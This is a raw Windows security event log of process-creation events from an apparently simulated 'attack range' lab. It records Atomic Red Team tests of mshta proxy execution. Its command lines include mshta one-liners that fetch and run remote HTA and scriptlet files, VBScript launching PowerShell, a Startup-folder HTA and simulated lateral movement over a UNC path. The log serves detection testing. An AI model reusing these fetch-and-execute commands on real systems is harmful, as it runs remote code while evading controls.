02/23/2022 09:38:29 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103513501 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1908 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x17ac Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host Hello, MSHTA!;Start-Sleep -Seconds 5 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:29 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103513494 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x17ac New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x132c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta.exe "about:'" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:29 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103513487 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x132c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c "mshta.exe "about:'"" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103513421 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1180 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x12d0 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host ae2e5018-10e5-4394-9739-bfb252c4a032; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:27 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103513152 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E4 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0x12d0 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1b0c Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\system32\mshta.exe" "\\WIN-DC-MHAAG-AT\C$\Users\Administrator\AppData\Local\Temp\Test.hta" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:26 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103512921 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x888 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:25 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103512734 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1960 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x171c Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 2ad65874-623c-495a-8ef1-b50c8f5a8fb0; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:24 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103512716 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E4 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0x171c New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1b0c Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\system32\mshta.exe" "about:'" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:23 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103512491 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x6c New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler About -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:21 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103511770 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E4 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0xd68 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1b0c Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\system32\mshta.exe" "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:19 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103511582 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x9a4 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:07 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103509127 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1078 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xd58 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 77db24d1-3e3b-4934-8596-bddced2bd0eb; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:06 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508953 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\SYSTEM Account Name: WIN-DC-MHAAG-AT$ Account Domain: ATTACKRANGE Logon ID: 0x3E7 Target Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Process Information: New Process ID: 0xd58 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x348 Creator Process Name: C:\Windows\System32\svchost.exe Process Command Line: C:\Windows\System32\mshta.exe -Embedding Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:05 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508811 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x4e0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1620 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:05 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508807 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x132c New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:05 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508784 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1620 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x20 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\mshta.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:04 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508600 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1bd4 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xf58 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -file C:\AtomicRedTeam\atomics\T1218.005\src\powershell.ps1 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:04 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508539 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xf58 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1f8 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file C:\AtomicRedTeam\atomics\T1218.005\src\powershell.ps1"":close") Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:04 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508487 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1814 New Process Name: C:\Windows\System32\calc.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1a84 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\calc.exe" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:04 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508439 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a84 New Process Name: C:\Windows\System32\mshta.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ae4 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close(); Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/23/2022 09:38:04 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-dc-mhaag-attack-range-331.attackrange.local TaskCategory=Process Creation OpCode=Info RecordNumber=103508433 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: ATTACKRANGE\Administrator Account Name: administrator Account Domain: ATTACKRANGE Logon ID: 0xC4ECE Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1ae4 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x51c 